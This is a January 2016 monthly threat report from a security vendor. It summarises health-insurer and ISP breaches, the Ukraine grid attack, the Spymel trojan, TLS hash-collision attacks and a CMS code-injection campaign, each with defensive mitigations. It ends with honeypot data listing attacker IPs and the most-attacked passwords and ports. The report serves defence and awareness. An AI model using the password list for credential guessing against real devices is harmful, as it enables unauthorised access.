Threat Report Monthly Wrap Up
January 2016

This month, we hear about the most impactful data breaches like those affecting Centene and Time Warner Cable, the discovery of new malware like Spymel, and web and cloud security trends from the previous month.

Breaches

Centene Loses Hard Drives Containing 950,000 Individuals’ Protected Health Information (PHI)

On January 25, 2016, Centene, a St. Louis-based health insurer, reported six missing hard drives that contained protected health information (PHI) of approximately 950,000 individuals.  The six hard drives contained information of individuals who received laboratory services from 2009 to 2015, including names, addresses, birth dates, social security numbers, member ID numbers, and health information.

The loss or unauthorized disclosure of PHI presents a lucrative opportunity for cybercriminals as health insurance credentials sell for $20 each on the Dark Web.  When combined with personally identifiable information (PII) such as social security numbers, dates of birth, and place of birth known as “fullz” or “full identity kitz,” it could yield upwards to $1000 per record for cybercriminals.

In the past, victims of PHI theft have reported their medical information being used to acquire treatment or services, obtain pharmaceuticals or medical equipment, or obtain government-provided benefits such as Medicare or Medicaid.  

Reference:  Press Release: Centene Announces Internal Search of Information Technology Assets | US Health Insurer Centene Loses 950,000 People's Records | Centene Says Employee Error Led to Missing Hard Drives, Company Still Searching for Records

Mitigation Strategies:

  • Monitor Intrusion Detection System (IDS) signatures to detect network reconnaissance and malware communications seeking instructions or callbacks from command and control infrastructure.
  • Utilizing proper log management can detect suspicious fraud events such as the sharing of usernames/passwords or higher than normal rates in the volume of data transfers
  • Use network traffic analysis to inspect for suspicious or malicious activity such as users accessing the network outside of their working hours or to detect the presence of data exfiltration 

Time Warner Cable Warns 320,000 Customers of Data Breach

On January 6, 2016, Time Warner Cable (TWC) instructed 320,000 Road Runner customers to change their email passwords after hackers compromised their email addresses and passwords.  According to several major news outlets, the customers’ data may have been compromised through malware downloaded during phishing attacks or indirectly through other types of data breaches. 

The FBI initially notified Time Warner Cable (TWC) about the potential compromise of thousands of customer accounts.  The hackers obtained information on users of TWC’s Road Runner service or customers with email addresses ending in “rr.com.”

Since the FBI made the initial discovery, there is a high likelihood that cybercriminals have already sold and profited from the stolen account credentials of the 320,000 customers or close to three percent of TWC’s 11.4 million residential and business customers. 

On the Dark Web, stolen email account credentials could net cybercriminals $50 per account and if the account contained payment card information it could net from $6 to $25 each for the credit card data.

References:  Time Warner Cable Confirms Major Data Breach | Time Warner Cable Warns 320,000 Customers of Hack | So What's All This About 320k Time Warner Cable Users Being Hacked?

Mitigation Strategies:

  • Affected customers should quickly reset passwords to stronger ones with at least 10-12 characters in length to include a combination of uppercase and lowercase letters, numbers, and special characters.  Additionally, these customers should check their bank accounts and payment card history to identify any fraudulent transactions, promptly report any incident, and place a freeze or cancel compromised accounts.
  • Netflow data analysis can show traffic communicating from a non-trusted node to an untrusted source such as command and control servers.
  • Log management can detect any suspicious user account activity.
  • A Security Operations Center team provides around-the-clock security monitoring, daily log review, web application firewall management and advanced anomaly detection

Malware

Ukraine Suffers World’s First Ever Hacker-Initiated Power Outage

On December 23, 2015, Ukraine suffered a coordinated attack in the form of Denial-of-Service (DDoS) attacks and BlackEnergy 3 malware targeting Ukrainian power companies that caused power outages affecting 80,000 customers. Based on U.S. ICS-CERT analysis, the initial infection vector appears to have been a spear phishing email via a weaponized Microsoft Word attachment.

The unspecified attackers used that access to open circuit breakers that cut power.  The likely next steps were that the attackers used a wiper utility called Kill Disk to thwart recovery efforts before conducting DOS attacks, preventing power company call center employees from receiving customer reports of outages. 

This is the first known hacker-initiated power outage. Multiple security vendors and the Ukrainian Government have implicated Russia as the main culprit, specifically a state-sponsored group known as the Sandworm Team.  Several reports provide strong indications that cyber actors affiliated with the Russian Government carried out the attack; however, attribution to a specific threat actor is an onerous undertaking that requires time, resources, and patience.

This recent case offers insight into how malicious actors can potentially execute a cyber operation against the critical infrastructure of perceived adversarial nation-states.

Reference: ICS-CERT Alert: ICS-ALERT-14-281-01C | Ukraine Utility Cyber Attack Wider Than First Reported  | Analysis Confirms Coordinated Hack Attack Caused Ukranian Power Outage | New Wave of Cyberattacks Against Ukranian Power Industry

Mitigation Strategies:

  • Intrusion Detection System (IDS) signatures to monitor and detect packets on the network to compare them against our comprehensive database of signatures from known malicious threats
  • Log management can be used to collect and aggregate data from multiple sources to examine indicators of suspicious or malicious activity to inform customers of potential threats and look for signs of a compromise
  • 24x7 Security monitoring to provide around-the-clock monitoring, alerting, reporting, and remedial services

Spymel, New Digital-Signed Malware Emerges

In early January 2016, security researchers discovered a new digitally-signed malware called Spymel, which is a Trojan horse that steals information from the compromised computer.  The malware is delivered via phishing emails with malicious JavaScript files disguised in a ZIP archive and when the victim opens the file, it downloads and installs Spymel from a remote location. 

Once installed on the compromised host, Spymel monitors and communicates with command and control server information obtained from applications such as Task Manager and Process Explorer and user keystrokes.  Spymel is able to prevent the victim from running of software capable of terminating the malware and uses the digital certificate to try and evade security software.

Spymel is another reminder of the upward trend of code-signed malware using legitimate digital certificates to bypass security mechanisms.  The use of SSL certificates is essential in Public Key Infrastructure (PKI), as it helps keep sensitive information sent across the Internet encrypted and establishes trust amongst parties.

Code signing provides high levels of assurance and better protection of information from malware.  However, malicious actors have abused this same level of trust and established an underground economy specializing in the purchase, sale, and distribution of certificates to circumvent defense mechanisms. 

In an attack scenario against cloud computing resources, an attacker can use a victim’s cloud credentials to eavesdrop on user activities and transactions, manipulate data, return falsified information, and redirect clients to malicious sites. 

Reference: Spymel Trojan Taps Digital Certificates to Avoid Detection | Spymel Info-Stealing Trojan Evades Antivirus Detection via Stolen Certificates | Yet Another Signed Malware-Spymel

 

Mitigation Strategies:

  • Monitor Intrusion Detection System (IDS) signatures to detect the attempted malware communications seeking instructions or callbacks from command and control infrastructure.
  • A Security Operations Center (SOC) team that can provide around-the-clock security monitoring, daily log review, web application firewall management and advanced anomaly detection. 
  • Log management that can detect any new service installed or registry changes on a server if logs are configured correctly.  This service can all examine logs to determine indicators of compromised credentials such as excessive downloads or shares or anomalous access patterns 

Cloud Security

Cryptographic Attacks Threaten Data-in-Motion

Earlier this month, during the 2016 Real World Cryptography Conference, cryptography researchers unveiled two new attack vectors on secure protocols such as TLS, IKE, and SSH.  The researchers named these attack vectors SLOTH or Security Losses from Obsolete and Truncated Transcript Hashes and HTTPS Bicycle; they rely on attackers exploiting weaknesses in MD-5 and SHA-1 hashing algorithms.

SLOTH is a new class of transcript collision attack that can be leveraged against TLS, IKE, and SSH by exploiting weaknesses in MD-5 and SHA-1.  SLOTH could be used for credential forwarding attacks on client and server authentication, TLS channel bindings, and impersonation and downgrade attacks in TLS 1.1, IKE v2, and SSH-2.

The HTTPS Bicycle attack could allow attackers to discover the length of specific parts of the plain-text data underneath TLS packets by using a side-channel attack, enabling them to determine the user’s password.  

These new cryptographic attacks on insecure hashing algorithms underpinning secure communication protocols raise concerns about the protection of data-in-transit as it moves to the cloud.  An attacker can leverage these techniques to perform multiple attacks and include a Man-in-the-Middle (MiTM) attack, allowing them to intercept and modify communications. 

Cloud-based services are particularly vulnerable to MiTM, as the computational and financial requirements to mount a cryptographic attack have been significantly reduced.  As more businesses turn to Anything-as-a-Service cloud service models, we recommend phasing out the use of MD-5 and SHA-1 to protect and defend against attackers targeting their communications and data.

Reference: Security Losses from Obsolete and Truncated Transcript Hashes (CVE-2015-7575) | Transcript Collision Attacks: Breaking Authentication in TLS, IKE, and SSH | SLOTH Attacks Weaken Secure Protocols Because They Still Use MD5 and SHA-1 | How Long Is Your Password? HTTPS Bicycle Attack Reveals That and More

 

Web Security

Code Injection Affects 3,500 Public Servers Worldwide

Earlier this month, security vendor Symantec discovered a worldwide infection of 3,500 public servers on January 22, 2016.  The infection vector consisted of a malicious script that redirects victims to other compromised websites that could be used to download malware and as a reconnaissance attempt in support of future unspecified attacks.  Interestingly, the compromised sites used the same content management system and scripts designed to collect information such as page title, URL, referrer, Shockwave Flash version, user language, monitor resolution and host IP address. 

Reportedly, the attack's modus operandi includes loading a compromised page in a user's browser when that person visits the site. The malicious script then waits 10 seconds and then runs remote JavaScript code, which then runs several additional scripts in an attempt to hide the malicious script from the victim.  Seventy five percent of the infected websites, generally business, .edu and government types, are located in the United States.

CMS-powered websites such as Magento, Joomla, Drupal, and WordPress remain ideal targets for hackers for actions such as website defacements, botnets, malware distribution, or stolen customer and financial data. We suspect that Drupal and/or Magento could be vulnerable to this malicious code injection, as each vendor released patches in January disclosing either a cross-site request forgery or cross-site scripting vulnerability.  We recommend that website administrators inspect their HTML code to determine if they are vulnerable to code injection as well as quickly patch vulnerable CMS-enabled websites.

Reference: 

Drupal Moves to Fix Flaws in Update Process | Bugs in Drupal's Update Process Could Lead to Backdoored Updates, Site Compromise | If You're One of Millions Using Magento, Stop Whatever You're Doing and Patch Now | Usage of Content Management Systems for Websites

Honeypot Data - Top 20

IP Addresses
92.249.140.63 - NEW
217.114.218.18 - NEW
200.133.1.131 - NEW
218.24.91.130 - NEW
180.97.221.22 - NEW
62.212.82.51 - NEW
166.62.102.232 - NEW
95.211.224.49 - NEW
31.204.150.138 - NEW
209.58.130.151 - NEW
162.248.52.111 - NEW
91.229.77.92 - NEW
104.194.26.204 - NEW
104.194.26.205 - NEW
209.58.131.151 - NEW
88.198.41.86 - NEW
185.26.122.13 - NEW
82.199.130.34 - NEW
23.251.32.154 - NEW
85.25.198.199 - NEW
Most Attacked Passwords*
admin
123qwe
root
password
12345
ubnt
123456
1234
raspberry
123
support
12345678
1234567890
default
123456789
1234567
user
1
test
alpine
Most Attacked Ports*

Protocol

Service

Name

TCP20005NetUSB
TCPwwwWorld Wide Web HTTP
UDPwwwWorld Wide Web HTTP
TCP2700Matlab
TCPRingZero[trojan] RingZero
TCPRTB666[trojan] RTB 666
TCPSeeker[trojan] Seeker
TCPWANRemote[trojan] WAN Remote
TCPWebDownloader[trojan] WebDownloader
TCPWebServerCT[trojan] Web Server CT
TCP9418git
UDPhttpWorld Wide Web HTTP
TCP[ICS] OPC UA XML[ICS] OPC UA XML
TCP8085http proxy for Koobface Variant
TCPReverseWWWTunnel[trojan] Reverse WWW Tunnel Backdoor
TCPRamen[trojan] Ramen
TCPNoob[trojan] Noob
TCPAckCmd[trojan] AckCmd
TCPBackEnd[trojan] Back End
TCPBO2000Plug-Ins[trojan] Back Orifice 2000 Plug-Ins

*The following data was shared by a SANS Institute Maintained Honeypot